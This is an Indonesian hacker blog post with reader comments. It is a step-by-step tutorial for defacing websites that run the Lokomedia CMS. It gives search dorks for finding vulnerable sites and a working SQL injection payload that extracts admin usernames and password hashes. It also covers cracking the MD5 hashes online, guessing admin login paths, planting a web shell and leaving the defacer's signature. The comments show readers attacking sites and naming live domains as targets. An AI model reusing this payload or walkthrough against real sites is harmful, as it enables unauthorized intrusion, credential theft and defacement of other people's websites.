News Ticker

Deface SQL Lokomedia

By Berandal - Saturday, January 21, 2017 25 Comments





Malem fanss :* Malem juga haters :p

Berandal update lagi nih :* Kali ini gw mau share Tutorial Deface CMS Lokomedia. Gw bikin tutorial ini gara2 gw liat salah satu kiriman Master Lokomedia di grup FB Indonesia Defacer Tersakiti. Gw bingung gimana sih kok bisa dapet segitu banyak :v Wkwk :v

Baca juga: Tutorial Deface WP Themes Qualifire.

Oke, simak langsung aja ya :)

Bahan : 

1. Dork :

inurl:/statis-1-profil.html
inurl:/statis-2-profil.html
inurl:/statis-3-profil.html
   Kembangin lagi biar dapet yg VULN + Perawan :p
   Dork lengkap tunggu post selanjutnya :*

2. Exploit
    'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+

3. MD5 Decrypter
      KHUSUS MD5 DECRYPTER, LU DECRYPT PAKE OTAK LU NDIRI! 
      Bercanda :v Ada tools online nya kok :p
https://hashkiller.co.uk/md5-decrypter.aspx
http://md5online.org/

Tutorial:
1. Dorking pake dork di atas.

2. Pilih salah satu target. Salah dua juga gapapa :v

3. Masukan injeksi nya.
'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+ 
   Gatau caranya? :v Sini gw ajarin :p
   http://site.co.li/statis-1-profil.html lu tambahin exploit nya sesudah angka. Jadinya gini:
   http://site.co.li/statis-1'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+-profil.html

4. Kalo vuln jadinya bakal kek gini.



5. Tekan Ctrl+U trus copy MD5 nya ke MD5 Decrypter.

6. Tinggal cari admin page nya. Biasanya sih di:
http://target.co.li/admin
http://target.co.li/adminweb
http://target.co.li/administrator
http://target.co.li/redaktur

7. Tanem shell? Use ur brain :) Jangan maunya disuapin mulu!

8. Akses shell? Klik kanan gambar yg ancur. trus 'Copy Image Location'.

9. Jan lupa pasang nick gw di Script lu :v Berandal & OWL SQUAD :)

Saran gw sih, jangan langsung injek web nya. Cari dulu admin login nya :) Biar gak sakit hati :P
Simak video gw dibawah :D



Okee, cukup ya tutor kali ini :D Kalo ada salah2 kata mohon maap :)


Regards,


POPULAR ARTICLES :


25 comments to ''Deface SQL Lokomedia"

ADD COMMENT
  1. kok agan gampang bener ya :v, ane gagal mulu pas bagian hash md5, selalu not found pas mau di decrypt di hashkiller / md5decrypt. solusi dong gan

    ReplyDelete
    Replies
    1. Faktor face :v, mungkin belum beruntung, atau kalo mau yha decrypt manual sendiri :D, atau gk yha asal nebak aj

      Delete
  2. coba cek http://idamnuriqbal.id apa ada kelemahannya gan masta, klu ada mohon info dmana letak kelemahannya. agar dapat saya perbaiki
    terima kasih.

    ReplyDelete
    Replies
    1. sorry min w numpang lewat doang :V

      edeh bocah 1 ni :'v cms gk ada web make blogger :'v pea

      Delete
    2. This comment has been removed by the author.

      Delete
  3. kalau login di cpanel suka salah nih

    ReplyDelete
    Replies
    1. password yg didapat dengan teknik sql lokomedia beda sama password cpanel gan :)

      Delete
  4. Replies
    1. bukannya diliatin pas aal video gan :D

      Delete
  5. udh nemu vuln + id pw admin login udh ketemu ehh pas mau isi id pw admin malah gk ada :3

    ReplyDelete
  6. ID+Pass udah dapet, eh adminnya loginnya yg ribet dicari XD

    ReplyDelete
    Replies
    1. itu masalah utama sql lokmed ini hwhwh

      Delete
    2. Ane udah ke cpanel tpi waktu koneksi berahir mulu gan

      Delete
  7. Kok blank ya mas ? Udah berhasil semua , waktu masuk ke log-in admin udah dimasukin datanya kok blank ?

    ReplyDelete
  8. This blog is so stunningly outstanding. Left its readers in the awe.
    click now

    ReplyDelete
  9. Sasaran empuk neh, gaan http://katalogkesehatan.com bisa :D

    ReplyDelete
  10. Njemg Not Found semua :3

    ReplyDelete
  11. Cari admin loginnya very hard..

    ReplyDelete
  12. ada yg tau ini tipe hash apa?? c1717b01367691479191356d2ee376d7

    ReplyDelete
  13. admin login nya gimana nih :V pada ngilang gua liat di site site korban :V

    ReplyDelete
  14. LINK HALAMAN ADMIN LOGIN DIMANA? UDH KELILING GAK ADA TOMBOL LOGIN AKMJ

    ReplyDelete
  15. unch unch :*
    berandal... aku ngefans sama berandal :*

    ReplyDelete